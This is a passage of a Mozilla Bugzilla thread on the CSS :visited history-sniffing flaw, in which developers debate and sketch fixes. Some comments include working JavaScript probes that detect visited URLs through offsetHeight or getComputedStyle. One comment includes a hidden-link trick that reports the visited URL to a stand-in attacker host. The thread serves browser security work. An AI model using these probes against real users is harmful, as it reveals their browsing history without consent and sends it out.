Jordan, a hashkey-based query into the DB, searching for a string which is indexed, may well be faster than parsing the URL and finding out the domain, yes. bz was saying that you need to base this on actual tests (coding it up and measuring speed), not just guesses.
That said, I think that speed is no real argument, given the threat that this bug represents, as shown by several public proof of concepts now.
Comment 93•16 years ago
|
||
Note that you can also do it the other way around: If DB lookup is faster, you can do that first, and only when you find a "visited" link, compare the domain and decide whether to show/treat it as visited.
Comment 94•16 years ago
|
||
I am surprised to see that the long discussion is ongoing while a patch (backend patch, v.1 on 2002-05-28) has been available from the beginning and was never committed. The patch is imperfect, but it is better than no patches, isn't it? Personally, it will probably be fine for me if the :visited pseudo-class (and the VLINK attribute and the like) is completely ignored, since some web sites assign the same style to :link and :visited anyway and those sites do not irritate me much.
Assignee | ||
Comment 95•16 years ago
|
||
(In reply to comment #94)
> committed. The patch is imperfect, but it is better than no patches, isn't it?
No.
Comment 96•16 years ago
|
||
(In reply to comment #95)
> > committed. The patch is imperfect, but it is better than no patches, isn't it?
>
> No.
Why? If I understand correctly, that 6-year-old patch provides, as a bottom line, an option for a user to choose privacy over :visited support. You can discuss a more sophisticated solution later, if you like.
Assignee | ||
Comment 97•16 years ago
|
||
Oh, the first patch. I suppose it might be worth updating that; it would pretty much need to be rewritten at this point, though.
Assignee | ||
Comment 98•16 years ago
|
||
Here's a patch for a layout.css.visited_links_enabled pref, defaulting to true.
I suppose this patch also needs a test, though.
Attachment #343901 -
Flags: superreview?(bzbarsky)
Attachment #343901 -
Flags: review?(bzbarsky)
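(For anyone wanting the behaviour now: the pref added by this patch can be flipped in about:config, or from user.js as below, which makes every link style as unvisited.)
// user.js
user_pref("layout.css.visited_links_enabled", false);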
Comment 99•16 years ago
|
||
David, thank you for your prompt replies and the updated patch. I cannot test the patch, sorry.
I think the pref added by the patch is useful for a small fraction of users, and maybe for a larger number of users if security experts inside or outside Mozilla explain the issue.
Updated•16 years ago
|
Attachment #343901 -
Flags: superreview?(bzbarsky)
Attachment #343901 -
Flags: superreview+
Attachment #343901 -
Flags: review?(bzbarsky)
Attachment #343901 -
Flags: review+
Comment 100•16 years ago
|
||
Comment on attachment 343901
patch for a pref
Looks good. Should be simple to test with mochitest, right?
Comment 101•16 years ago
|
||
I'm interested to see what links I've visited, but I don't care about fancy styles. A different colour for visited links is enough, and if a page queries the colour it can be told the unvisited colour, or if the data type allows, it can be told both colours.
Comment 81, https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c81 , mentions http://www.mikeonads.com/2008/07/13/using-your-browser-url-history-estimate-gender/ which requires javascript, and sends an http request of the form http://www.mikeonads.com/gender/analyze.php?sites= with a list of some of the sites from your history.
Allowing people to read the browser history is serious. Disabling all visited link styles except colour, and faking the colour when queried seems simple enough. Why is this still not fixed after nearly six and a half years?
Comment 102•16 years ago
|
||
Web pages can read the colors of pixels rendered in the page using SVG filters and the elementFromPoint API. It's a simpler variant of the following attack on cross-origin IFRAMEs:
http://lists.w3.org/Archives/Public/www-svg/2008Sep/0112.html
The cross-origin IFRAME attack would not work in Firefox today because we don't support pointer-events, but examining content in the same page *would* work today in Firefox 3 if someone coded it up.
Comment 103•16 years ago
|
||
Oh, sorry, that does still depend on pointer-events, so it doesn't work in Firefox yet. But the point is, relying on colors not being recoverable by the Web content is not a good idea. (There are other features that would also enable that, like the ability to draw SVG content to a canvas, which Opera supports and we'll want to add at some point.)
Comment 104•16 years ago
|
||
The content on a page should not be able to read the actual colour of links. If it wants to do awkward things like reading individual pixels, then maybe the browser should take the relatively expensive approach of allocating some more memory and re-rendering the whole page with all links in their unvisited colour. But then, if the reads of individual pixels affect rendering, you get a recursive problem and it might take a huge amount of resources to fully render.
Perhaps as soon as there is a call to read a pixel it switches to a double-rendering mode where 2 bitmaps are maintained, and most rendering is copied into both. One is displayed, and link colour depends on whether the link has been visited. The other uses the unvisited colour. Pixel reads would be from that second bitmap.
Or perhaps the option to only allow colour changes should also disable pixel reads.
Comment 105•16 years ago
|
||
Regarding "SupportVisitedPseudo", could we have an override at the docshell level (perhaps on nsIMarkupDocumentViewer, but event better if cascading like allowImages, allowJavascript & company)?
BTW, I'm still convinced that an efficient implementation of the SafeHistory approach would be the way to go.
Assignee | ||
Comment 106•16 years ago
|
||
I landed the pref patch: http://hg.mozilla.org/mozilla-central/rev/30d9ff763b22 .
Followups on the pref should probably go in different bugs.
Comment 107•16 years ago
|
||
SafeHistory stops you seeing what links you've visited in several cases when you would like to know, and allows the page to see in several cases when it shouldn't.
Reading pixels is clearly awkward, and so may incur extra cost, because the rendered page contains information that only the user should see.
Comment 108•16 years ago
|
||
(In reply to comment #107)
> SafeHistory stops you seeing what links you've visited in several cases when
> you would like to know
still better than not knowing anywhere, like a global preference implies.
> and allows the page to see in several cases when it
> shouldn't.
Would you care to explain? If you visited a certain site following a link on my own site, what kind of extra information do I gain by spying on :visited stuff (provided that you've got JS enabled and therefore I can log every click)?
> Reading pixels is clearly awkward, and so may incur extra cost, because the
> rendered page contains information that only the user should see.
I hope and assume that any proposal for reading pixels does not cross domain boundaries (i.e. I shouldn't be able to take a screenshot of cross-site frames, right?). That said, pixel colors are just one way to leak :visited status info: the "classic" scriptless attack, for instance, uses background images to perform direct CSS-only logging.
Comment 109•16 years ago
|
||
I don't have a suggestion about how to fix it, but I have one note...
You could effectively use this bug to out the author of an anonymous blog, by searching history for the posting interface of the blog and calling home if you get a winner -- or perhaps employ it to search for people who've recently viewed Wikileaks submission policy.
Kill it. Kill it with fire. There's no such thing as overkill here.
Comment 110•16 years ago
|
||
This may be an issue, but it's rather a standard W3C feature.
If you are so concerned about privacy, why use history at all? Disable it (in preferences) and be secure not only against this feature, but even against an FBI raid (as for Wikileaks ;p).
Comment 111•16 years ago
|
||
My distress isn't for myself -- *I*, having read Mozilla bug #147777 last Saturday, am now aware of the problem and can take the proper precautions. (Although my ignorance of it for the past six years and six months distresses me.)
The stock solution -- to provide a preference that can be enabled to protect yourself, possibly even referencing that preference in the user interface -- isn't enough in this case. There's no good way to educate people about it, even by putting a big honking disclaimer in the install process; they'll forget it, or not understand it and click through it, and once they've done that they'll never consider it, ever again.
Even if you have it default off, they'll turn it on and then... never remember it. Goodness knows there's Mozilla preferences I only remember when I sit down to a fresh install and roundly curse all of your names. <g>
This is going to get somebody hurt -- I'll grant that it not having done so in six years is not a good support for my assessment of the problem's urgency, but we haven't been safe, we've been /lucky/.
Comment 112•16 years ago
|
||
From the W3C CSS specs (about :visited):
Note. It is possible for style sheet authors to abuse the :link and :visited pseudo-classes to determine which sites a user has visited without the user's consent.
UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user's privacy while rendering visited and unvisited links differently. See [P3P] for more information about handling privacy.
Is there any patch planned for this bug any time soon ???
Comment 113•16 years ago
|
||
The easiest way to fix this would be to only consider links within the same domain as :visited.
Comment 115•16 years ago
|
||
Please do not "fix" this issue in normal browsing mode by restricting :visited links to same domain links! The design and usability pattern of :visited links is old and useful, everybody got used to it.
I think, the best option would be to leave :visited link functionality as it is in normal browsing mode, but make it restricted in Safe Browsing mode (as it's done in Safari and IE8). If user seriously concernes his privacy, he would use Safe Browsing mode.
There're some screenshots and detailed description: http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/
Comment 116•16 years ago
|
||
(In reply to comment #115)
> I think the best option would be to leave :visited link functionality as it is
> in normal browsing mode, but make it restricted in Safe Browsing mode (as is
> done in Safari and IE8). If a user is seriously concerned about his privacy,
> he will use Safe Browsing mode.
I'm not sure if by safe browsing mode you are referring to private browsing mode or not, but if that's the case, we already do that. Inside private browsing mode, no link would be displayed as visited, no matter if the visit has happened before or after entering the private browsing mode.
Comment 117•16 years ago
|
||
"If user seriously concernes his privacy, he would use
Safe Browsing mode."
OK, then maybe we should not be concerned about any cross-site information leaks ... If a user distrusts a site, he will use private browsing mode.
This kind of thinking really exceeds my worst expectations ...
Comment 118•16 years ago
|
||
Let's not let this degenerate into a flamewar, but I think that comment 115 has a valid point which is that there is a very real tradeoff here between security and working according to what is expected user behaviour.
The norm for donkey's years on every browser has been that visited links are always shown as visited whether or not they're on the same domain as what you're currently viewing. To break this feature is to break one of the most useful visual feedback aspects of a web browser.
Simple example: If you do a Google search, you have immediate feedback on whether or not you have previously visited a search result even before you read it. That's a huge benefit and it's just the first example I could think of.
I'm not familiar with the backend coding aspect but it seems to me that a better and more user friendly approach would be to modify the implementation of the GetComputedStyle function to prevent this attack rather than making the :visited feature more or less useless.
Comment 119•16 years ago
|
||
Ehsan, yes, I do mean private browsing mode. And no, it's not protecting from
this issue. At least, in Firefox 3.1 Beta 3.
Here’s a testcase - http://sharovatov.ru/testcases/visitedIssueTest.html
I visited both http://ya.ru and http://www.google.com links in IE8 InPrivate
mode, then went to the testcase page and it didn’t tell anything as if I hadn’t
visited these URLs. In Firefox 3.1 Beta 3 Private Browsing mode it showed that
I visited both sites.
Screenshots:
http://sharovatov.ru/screenshots/visitedIssueIE8.png
http://sharovatov.ru/screenshots/visitedIssueFF.png
Jens, your point is not valid. This issue with visited links has been known since the year 2000, maybe even earlier. There's still no good solution to it, while all the XSS issues are fixed without any problems. And private browsing mode wasn't
invented just because somebody thought it was a nice option - it was
implemented because people wanted to browse sites without any traces in history
or wherever. Don't you see that private browsing mode fully solves this
"issue"? If I use facebook, flickr, digg, I can be found there even without
this :visited link issue. But if I'm about to visit my internet banking site,
I'll use the safest browser and the safest mode it's got. That's what users
should be taught.
Comment 120•16 years ago
|
||
@#115 & #116: I don't think this has a lot to do with "Safe Mode". Safe Mode/Private Browsing Mode is what I'd use if I didn't trust my host system, not if I want to browse securely. If I have my host system's drives running in something like truecrypt or dmcrypt or whatever and I knew I was the sole user of the system, is there any reason I would ever want to use Safe Mode?
Limiting :visited to the same domain is something which I'd want to do regardless of me being in Private Browsing Mode or not. I agree it breaks a common pattern, but IMHO added security is a reason to do this. Systems, browsers, etc. should be secure by default.
If it's only done in Private Browsing Mode, I hope it'll be possible to change some about:config value to always enable it in normal mode. Regardless, I'm not convinced it shouldn't be the default for "normal mode" as well - AFAIK Private Browsing Mode is only about not saving information on the host system. (And even if it wasn't, "normal mode" should still be free of privacy leaks by default.)
@#118: I can see this being annoying for sites like Google Search. FF integrates with some blacklisting engine, i.e. it shows a warning about a site being unsafe. Maybe as a default, ":visited for other domains" can be disabled on sites which are in this blacklist?
Comment 121•16 years ago
|
||
"but it seems to me that a
better and more user friendly approach would be to modify the implementation of
the GetComputedStyle function to prevent this attack"
Yes. I think implementation or at least design work on that is ongoing. I remember some discussion about that in this bug.
Comment 122•16 years ago
|
||
(In reply to comment #119)
> Ehsan, yes, I do mean private browsing mode. And no, it's not protecting from
> this issue. At least, in Firefox 3.1 Beta 3.
>
> Here’s a testcase - http://sharovatov.ru/testcases/visitedIssueTest.html
>
> I visited both http://ya.ru and http://www.google.com links in IE8 InPrivate
> mode, then went to the testcase page and it didn’t tell anything as if I hadn’t
> visited these URLs. In Firefox 3.1 Beta 3 Private Browsing mode it showed that
> I visited both sites.
>
> Screenshots:
> http://sharovatov.ru/screenshots/visitedIssueIE8.png
> http://sharovatov.ru/screenshots/visitedIssueFF.png
Are you sure that you had actually entered the private browsing mode? If you had, your window title should have had "(Private Browsing)" (or an equivalent text in your locale) at its end, but in the screenshot that you have posted, that is not the case.
To enter the private browsing mode, please use the Tools > Start Private Browsing menu item. Let me know if this doesn't solve the issue.
Comment 123•16 years ago
|
||
(In reply to comment #118)
> I'm not familiar with the backend coding aspect but it seems to me that a
> better and more user friendly approach would be to modify the implementation of
> the GetComputedStyle function to prevent this attack rather than making the
> :visited feature more or less useless.
Only modifying getComputedStyle() would be pointless IMO. :visited isn't limited to changing colors - it can change the size of an element as well, for example, and then it is simply a matter of checking the element's offsetHeight. Of course one could limit :visited to "simple" CSS properties (probably meaning only color and background). But even then one could use a canvas to make a "screenshot" of the current page and get the color values of the pixels. In other words, I don't think that allowing the site to display external links as visited while preventing this information from leaking out is realistic.
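To illustrate the offsetHeight point, a probe along these lines works against the current behaviour (the class name, test URL and threshold here are made up, and a height change on :visited is just one of many ways to make visitedness measurable from script):

function linkWasVisited(url) {
  // :visited changes the link's height; offsetHeight reads it back.
  var head = document.getElementsByTagName("head")[0];
  var style = document.createElement("style");
  style.appendChild(document.createTextNode(
    "a.probe { display: block; height: 10px; overflow: hidden; }" +
    "a.probe:visited { height: 50px; }"));
  head.appendChild(style);

  var link = document.createElement("a");
  link.className = "probe";
  link.href = url;
  link.appendChild(document.createTextNode("x"));
  document.body.appendChild(link);

  var visited = link.offsetHeight > 30;  // 50px only if the :visited rule applied

  document.body.removeChild(link);
  head.removeChild(style);
  return visited;
}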
Comment 124•16 years ago
|
||
Ehsan, you're absolutely right, I screwed this up - I was entering Firefox safe mode instead of Private Browsing mode - and thought that safe mode would be private :) Way cool! Thanks Firefox team!
Ali, that's what I'm talking about! If the issue is fixed by restricting :visited to a same-domain policy, it will hurt the user experience. Styling :visited links differently is a very common and widely-used visual pattern - and you mentioned a very good example - search engine results pages. I don't think a same-domain policy would work here.
Regarding your proposal to modify the implementation of getComputedStyle - how are you going to modify it? What if I set an a:visited span {display: none} stylesheet rule for an <a href="http://test.com/"><span>link text</span></a> link and then use getComputedStyle to get the current style of my span?
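Concretely, such a probe could look roughly like this (markup and URL are made up; it relies on the current behaviour where a :visited rule can change the computed style of a link's descendants):

var head = document.getElementsByTagName("head")[0];
var style = document.createElement("style");
style.appendChild(document.createTextNode(
  "a.probe:visited span { display: none; }"));
head.appendChild(style);

var link = document.createElement("a");
link.className = "probe";
link.href = "http://test.com/";  // the URL being tested
var span = document.createElement("span");
span.appendChild(document.createTextNode("link text"));
link.appendChild(span);
document.body.appendChild(link);

// Today this reports "none" exactly when the URL is in history.
var visited = window.getComputedStyle(span, "").display == "none";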
Comment 125•16 years ago
|
||
@Wladimir:
last time I checked, taking canvas screenshots (via drawWindow(), I guess) was not allowed to content scripts.
However, trying to prevent leakage at the getComputedStyle() level is, as you said, a waste of time short of dropping :visited support entirely, which is totally unrealistic.
On the other hand there's a middle ground in limiting visited links feedback, which is more bearable than disabling it outright for cross-site links: it's disabling them only if they've never been visited *from* the site you're currently displaying (no matter if they're same origin or not). This way you don't disclose any additional information that the site could not "legitimately" collect by monitoring your clicks.
This approach, as far as I know, is easy to implement with the current Places database, which traces the referer of each visited link, and is also the one pioneered by the SafeHistory extension.
Comment 126•16 years ago
|
||
Giorgio, let's say I was searching for some stuff on MSN Live Search, visited 100 sites from the search results, then I went to Google to search for the same stuff. All the links that I visited from MSN Search won't be marked as visited in google search results. Is it what you're proposing?
P.S. this is only one simple usecase where :visited support can't be restricted to same-domain or same-referer policy.
Comment 127•16 years ago
|
||
(In reply to comment #125)
> @Wladimir:
> last time I checked, taking canvas screenshots (via drawWindow(), I guess) was
> not allowed to content scripts.
Only for cross-domain invocations. There are no restrictions on taking screenshots of your own site and analyzing the data, unless I missed a recent behavior change of course.
> On the other hand there's a middle ground in limiting visited links feedback,
> which is more bearable than disabling it outright for cross-site links: it's
> disabling them only if they've never been visited *from* the site you're
> currently displaying (no matter if they're same origin or not). This way you
> don't disclose any additional information that the site could not
> "legitimately" collect by monitoring your clicks.
Last time I checked, Places lookups weren't the fastest thing on earth. See also comment 84.
Comment 128•16 years ago
|
||
(In reply to comment #125)
> This approach, as far as I know, is easy to implement with the current Places
> database, which traces the referer of each visited link, and is also the one
> pioneered by the SafeHistory extension.
SafeHistory doesn't work anymore thanks to places, see bug 320831 for details.
Comment 129•16 years ago
|
||
(In reply to comment #128)
> SafeHistory doesn't work anymore thanks to places, see bug 320831 for details.
Nonetheless a relational database to track visits like Places makes implementing a SafeHistory-like built-in feature trivial, if developers are motivated to do it and have some basic SQL skills.
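To make that concrete, the check would boil down to a query along these lines (the table and column names, moz_places / moz_historyvisits / from_visit / rev_host, come from the Places schema of this era and should be double-checked, as should the reversed-host convention rev_host uses):

// Sketch only: "was targetURL ever visited from a page on the current host?"
// Assumes read access to the Places database, e.g. from a SafeHistory-style service.
var sql =
  "SELECT 1 " +
  "FROM moz_historyvisits v " +
  "JOIN moz_places p ON v.place_id = p.id " +
  "JOIN moz_historyvisits r ON v.from_visit = r.id " +
  "JOIN moz_places rp ON r.place_id = rp.id " +
  "WHERE p.url = :targetURL " +
  "AND rp.rev_host = :currentRevHost " +  // referring page's host, stored reversed
  "LIMIT 1";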
(In reply to comment #127)
> (In reply to comment #125)
> > @Wladimir:
> > last time I checked, taking canvas screenshots (via drawWindow(), I guess) was
> > not allowed to content scripts.
>
> Only for cross-domain invocations. There are no restrictions on taking
> screenshots of your own site and analyzing the data
That's wrong (fortunately): http://mxr.mozilla.org/mozilla/source/content/canvas/src/nsCanvasRenderingContext2D.cpp#2352
@Vitaly:
yes, that's what I and security people from Stanford (http://crypto.stanford.edu/sameorigin/ ) are proposing. As I said, it's a
bearable middle ground which works fine with your first Google use case but of
course breaks other, arguably less impacting but not necessarily unimportant
ones. Can you suggest a better, effective and realistic approach?
Comment 130•16 years ago
|
||
Guys, comments 118 through 129 basically just repeat things that have already been said in this bug. Congrats. You've now sent a total of about 1000 e-mails (94 ccs, plus all the watchers * 12), made this bug that much harder to fix (10% more comments to read), and had your chance to say Important Things that everyone Absolutely Must Read.
Now please, unless you're adding something _new_ to this bug, do not comment on it.
Updated•16 years ago
|
Assignee | ||
Updated•16 years ago
|
Whiteboard: [sg:want P4] → [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70 before commenting]
Assignee | ||
Updated•16 years ago
|
Whiteboard: [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70 before commenting] → [sg:want P4][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting]
Comment 131•15 years ago
|
||
Hi! I've read through all the comments and a few blogs, and I don't think I've seen this mentioned anywhere: the only way to still keep the functionality of and to get protection from anything* a page's content might do is to simply have the highlighting completely outside the page:
1) Render everything as if the links were not visited.
2) Display an overlay above the window that highlights visited links. This can be anything (from a contrasting border to a scrolling marquee to alpha blended shining rays), as long as it's completely separate from the page.
Trusted extensions might have access** to it, but nothing inside the page can tell that it's there*. Anything the page does, including querying properties, loading backgrounds and looking at individual pixels would happen exactly as if the links were unvisited.
[*: except doing real screenshots, which would be silly to allow, and timing attacks, which are always hard (both to do and to prevent).]
[**: they might customize the look, or highlight otherwise interesting (e.g. dangerous or secure) links.]
This would probably be slower, but it can be just an option for users who really want protection. It might be the default for incognito mode, for instance. Anyway, it's the only way to absolutely prevent the attack: strictly separate what the user sees from what's on the page.
(By the way, this might be useful for protecting any information that the user must see but the page shouldn't; for instance, I think reading pixels might allow a page to read auto-completed forms even if the user never clicks 'send'.)
Comment 132•15 years ago
|
||
(In reply to comment #131)
> Hi! I've read through all the comments and a few blogs, and I don't think I've
> seen this mentioned anywhere: the only way to still keep the functionality of
> and to get protection from anything* a page's content might do is to simply
> have the highlighting completely outside the page:
This does slow down the attacker, but the attacker can still get private information from each click. Let's say a web page shows N hyperlinks that all say "Click here to continue." The unvisited links are styled to blend in with the background so the user can't see them; the visited links are visible because of the visited-link styling, so the user only sees the visited ones. Then the attacker can find out where the user has been from which link they click on.
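A rough sketch of such a page (URLs, class names and the logging endpoint are made up; however the visited indication ends up being drawn, whichever link the user can actually see and clicks hands the attacker a visited URL):

var candidates = ["http://bank.example.com/", "http://forum.example.org/"];  // URLs to test

var head = document.getElementsByTagName("head")[0];
var style = document.createElement("style");
style.appendChild(document.createTextNode(
  "a.bait { color: white; background: white; text-decoration: none; }" +  // blends into a white page
  "a.bait:visited { color: blue; }"));                                     // visible only if visited
head.appendChild(style);

for (var i = 0; i < candidates.length; i++) {
  var link = document.createElement("a");
  link.className = "bait";
  link.href = candidates[i];
  link.appendChild(document.createTextNode("Click here to continue"));
  link.onclick = (function (url) {
    return function () {
      // report which candidate the user could see
      new Image().src = "http://attacker.example/log?visited=" + encodeURIComponent(url);
      return false;
    };
  })(candidates[i]);
  document.body.appendChild(link);
  document.body.appendChild(document.createElement("br"));
}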
Comment 133•15 years ago
|
||
What do you think about limiting the visibility of "visited" for a domain A to other domains that were visited having A as the referrer? I think it is a bit better than just restricting it to the same domain.
If I am on a website A and I click on a link to another website B, it would be nice if any link to B could be seen as "visited" by A.
Comment 135•15 years ago
|
||
Comment #133 sounds like a very good option.
Comment 136•15 years ago
|
||
Comment #133 seems vulnerable:
Site www.alice.com puts a link to www.bob.com/404 on its page and either tricks the user into clicking it or follows it programmatically. The user has now visited www.bob.com from www.alice.com, so www.alice.com can tell whether the user has ever been to www.bob.com/secret.
Comment 137•15 years ago
|
||
Maybe there should be an option to disable all visited link styles except colour, and then it could render the page away from the screen with all links in the unvisited state, copy it to the screen, and then apply the visited colours. Any pixel reads would read the version in non-screen memory.
Any script that wanted to read pixels and do clever things might corrupt the appearance of the page, or it might be too difficult to work out where the link ended up, which would be needed to apply the colour, but the creators of such pages could avoid these problems by setting the visited and unvisited colours the same.
This seems to fix all the vulnerabilities. It should be the default, even though it breaks the spec, because people should not have their privacy violated unless they agree, even if a specification says they should.
Assignee | ||
Comment 138•15 years ago
|
||
That still doesn't solve timing channel attacks (see, e.g., test #3, which still works some of the time for me, and could probably be made more reliable).
Comment 139•15 years ago
|
||
I don't understand that test fully, but it seems to involve accessing a data structure about the page. If the data structure accessible to the page says all links are unvisited, whether they are or not, or if those fields are not read but spoofed, and all relevant code is designed to take the same time to run, then no timing attacks should be possible, unless they involve CPU cache. I don't see why there would be a timing vulnerability involving the cache, but if there is it can probably be compensated for.
Comment 140•15 years ago
|
||
Yes, one standard academic research solution to timing channels is "cross-copying", padding alternative control flows with skip instructions.
No, this is not all that easy to implement, and it is not yet implemented in Gecko. Good luck getting all browsers to agree while also competing on ultimate best performance!
Timing channels are notoriously hard to close. Leaking a few bits slowly can leak enough over time to compromise sensitive secrets. This is still a research topic.
/be
Comment 141•15 years ago
|
||
If the page reads the structure, or does some rendering that depends on visited state, the actual value in the structure would not be read; it would be spoofed as unvisited. The final stage of adding link colour would happen after the page had finished rendering (into non-display memory), so it would be more difficult to time. I suppose someone could put the same link 10,000 times on the page and try to time the rendering, but I don't see how they would time it, and in any case, when re-rendering the page to add link colour as in Comment #137, it could do all the links, or even do all of them in both colours with the correct colour last. I don't see how any timing attack would work.
Comment 144•15 years ago
|
||
The exploitability is public once more: http://draketo.de/light/english/your-browser-history-can-be-sniffed-64-lines-python-tested-firefox-353
Please fix it ASAP, so I can change the site to "Firefox is now immune".
Assignee | ||
Comment 145•15 years ago
|
||
Some thoughts on a fix:
Define an element's "relevant link" as:
* if the element is a link, it is its own "relevant link"
* otherwise, if it has an ancestor that is a link, it is the *nearest* such ancestor
* otherwise, it is null.
For every element that has a relevant link, we resolve style twice:
* once as though all links in the document are unvisited
* once as though all links except the relevant link are unvisited and the relevant link is visited
We make the first style context the frame's primary style context, but give that style context a pointer to the second. We also store in the style context whether the relevant link is actually visited.
(NOTE: This disables support for any selectors involving link visitedness and sibling combinators and also disables support for any selectors involving nested links and visitedness on the non-innermost.)
Then, when *drawing*:
* text
* border
* background-color
we call a ***non-inline*** function like:
nscolor
GetAppropriateColor(PRUint32 aIndex, nscolor aColors[2], nscolor aAlphaColor)
{
  nscolor color = aColors[aIndex];
  return NS_RGBA(NS_GET_R(color), NS_GET_G(color), NS_GET_B(color),
                 NS_GET_A(aAlphaColor));
}
in a manner something like:
nsStyleContext *primarySC = aFrame->GetStyleContext();
nscolor colors[2];
colors[0] = primarySC->GetStyleColor()->mColor;
nsStyleContext *visitedSC = primarySC->GetVisitedStyle();
if (visitedSC) {
  colors[1] = visitedSC->GetStyleColor()->mColor;
} else {
  // no if-visited style, so both entries are the unvisited color
  colors[1] = colors[0];
}
nscolor drawColor =
  GetAppropriateColor(primarySC->IsVisited(), colors, colors[0]);
Comment 146•15 years ago
|
||
Why don't you just load all linked elements, regardless of their visitedness state?
* Load everything which is linked in the stylesheet and put it into a cache.
* Let the display code only access stuff inside that cache.
This wouldn't have to slow anything down - the internal code would load resources the same way it does now, but the display code would block on some resources until they are in the cache.
Example:
Stylesheet:
.blah {background: url(unvisited.png)}
.blah:visited {background: url(visited.png)}
Both unvisited.png and visited.png get loaded from the web at the same time (so no private information gets leaked), but the display code only accesses one of them. If one isn't available yet, it looks to the display code, as if loading were simply taking longer.
This also has the advantage that a change in the state of an element doesn't require accessing the server again (more responsive websites).
Assignee | ||
Comment 147•15 years ago
|
||
(In reply to comment #146)
> Why don't you just load all linked elements, regardless of their visitedness
> state?
Why don't you read the whole bug report before acting like you know everything about the problem?
Comment 148•15 years ago
|
||
> Why don't you read the whole bug report before acting like you know everything about the problem?
I should have done that, sorry - I broke off after the first 20 comments or so. It's just too easy to think something would be easy to fix without knowing the codebase... and it's also far too easy to forget how hard it is to write a modern (and well-working) HTML-renderer - especially since basic HTML and CSS is deceptively easy to write.
I'm sorry for the noise.
Assignee | ||
Comment 149•15 years ago
|
||
A few more additions to comment 145:
* I wasn't necessarily saying we need to explicitly calculate the "relevant node"; it can be implicitly calculated during SelectorMatchesTree, by tracking whether we're still looking for it or not.
* we need to match anything that's either :link or :visited in HasStateDependentStyle or HasAttributeDependentStyle
* we need to make the re-resolve in ReResolveStyleContext check both contexts for pointer equality and CalcDifference
* we need to make sure that the style context's visited boolean (probably part of mBits) is checked when we're doing the sibling sharing optimization
Comment 150•15 years ago
|
||
(In reply to comment #145)
> Then, when *drawing*:
> * text
> * border
> * background-color
Are we sure that these are the only cases which matter in the type of attack we're trying to block here?
(I'm assuming that this plan is intended to block the pixel color attacks, please correct me if I'm wrong.)
Assignee | ||
Comment 151•15 years ago
|
||
(In reply to comment #150)
> (In reply to comment #145)
> > Then, when *drawing*:
> > * text
> > * border
> > * background-color
>
> Are we sure that these are the only cases which matter in the type of attack
> we're trying to block here?
I'm saying these are the only cases that *don't* matter in the type of attack we're trying to block. In other words, they're the only cases for which we'll differentiate between visited and unvisited links.
> (I'm assuming that this plan is intended to block the pixel color attacks,
> please correct me if I'm wrong.)
No, it's not intended to fix any attacks that involve user interaction.
Comment 152•15 years ago
|
||
(In reply to comment #151)
> (In reply to comment #150)
> > (In reply to comment #145)
> > > Then, when *drawing*:
> > > * text
> > > * border
> > > * background-color
> >
> > Are we sure that these are the only cases which matter in the type of attack
> > we're trying to block here?
>
> I'm saying these are the only cases that *don't* matter in the type of attack
> we're trying to block. In other words, they're the only cases for which we'll
> differentiate between visited and unvisited links.
I'm sure that this has been stated somewhere in the pile of comments on this bug, but I did my best and couldn't find it - so please excuse me if I need to ask what type of attack is your suggestion trying to block?
> > (I'm assuming that this plan is intended to block the pixel color attacks,
> > please correct me if I'm wrong.)
>
> No, it's not intended to fix any attacks that involve user interaction.
Hmm, I meant an attack performed by retrieving the color of a particular pixel by using SVG filters for example. That doesn't require user interaction, does it?
Assignee | ||
Comment 153•15 years ago
|
||
It's intended to address attacks such as those in the attachments labeled "test #1" through "test #4" -- attacks where entries in the history can be determined through script, without user interaction.
I suppose it doesn't address SVG filters, though, since one could probably use SVG filters to convert color differences into transparency differences and then learn something about the transparency by measuring performance characteristics of drawing it.
Comment 154•15 years ago
(In reply to comment #153)
> I suppose it doesn't address SVG filters, though, since one could probably use
> SVG filters to convert color differences into transparency differences and then
> learn something about the transparency by measuring performance characteristics
> of drawing it.
I don't think you could actually do timing analysis here, we don't do any optimizations based on inspecting alpha values and I don't think we'll start doing so.
However, if we add support for pointer-events values that make hit testing depend on pixel transparency, then elementFromPoint could be used to test transparency, and hence color. I think we can burn that bridge when we come to it.
Comment 155•15 years ago
|
||
(In reply to comment #145)
This sounds good, though personally I will probably continue disabling :visited completely (I am now used to it).
How much better in practice is this method than only considering the link itself as relevant?
Related to this, is there any statistics on how :visited is used in web pages in the real world? Such statistics will be very useful to decide what to do with this bug.
In addition, if you go with that method, please make the logic customizable by an extension if possible and reasonable, because no logic will be suitable in every situation.
Assignee | ||
Comment 156•15 years ago
|
||
(In reply to comment #155)
> How much better in practice is this method than only considering the link
> itself as relevant?
Much, since then 'color' wouldn't work, since the color actually applies to the text inside the link, not the link itself.
> Related to this, is there any statistics on how :visited is used in web pages
> in the real world? Such statistics will be very useful to decide what to do
> with this bug.
I don't know, beyond that large numbers of sites distinguish visited links based on colors.
How would they be useful? What decisions might be made differently based on such statistics?
> In addition, if you go with that method, please make the logic customizable by
> an extension if possible and reasonable, because no logic will be suitable in
> every situation.
Not a chance. It's performance-sensitive code, and it may be run at times when it's inappropriate to call into script.
Comment 157•15 years ago
|
||
Speaking about extensions, could nsIGlobalHistory2::isVisited() be changed to
take a second (optional) "referrer" URI parameter and the call from
nsDocShell::GetLinkState() to pass it currentURI?
This way an extension overriding the global history service could easily
implement a SafeHistory-like policy.
Assignee | ||
Comment 158•15 years ago
|
||
(In reply to comment #157)
> Speaking about extensions, could nsIGlobalHistory2::isVisited() be changed to
> take a second (optional) "referrer" URI parameter and the call from
> nsDocShell::GetLinkState() to pass it currentURI?
> This way an extension overriding the global history service could easily
> implement a SafeHistory-like policy.
Sounds reasonable to me; not sure how much we want to pile into this one bug.
Comment 159•15 years ago
|
||
(In reply to comment #156)
> (In reply to comment #155)
> > How much better in practice is this method than only considering the link
> > itself as relevant?
>
> Much, since then 'color' wouldn't work, since the color actually applies to the
> text inside the link, not the link itself.
I see. I did not know how styling works.
> > Related to this, is there any statistics on how :visited is used in web pages
> > in the real world? Such statistics will be very useful to decide what to do
> > with this bug.
...
> How would they be useful? What decisions might be made differently based on
> such statistics?
Such statistics would be useful to answer the questions such as:
* Does supporting border-color do any good?
* Which properties other than colors are worth supporting? How about text-decoration or border-style, for example?
* Are the cases involving the sibling selectors worth considering? (Maybe not, but the point is that it could be based on the actual data.)
Assignee | ||
Comment 160•15 years ago
|
||
(In reply to comment #159)
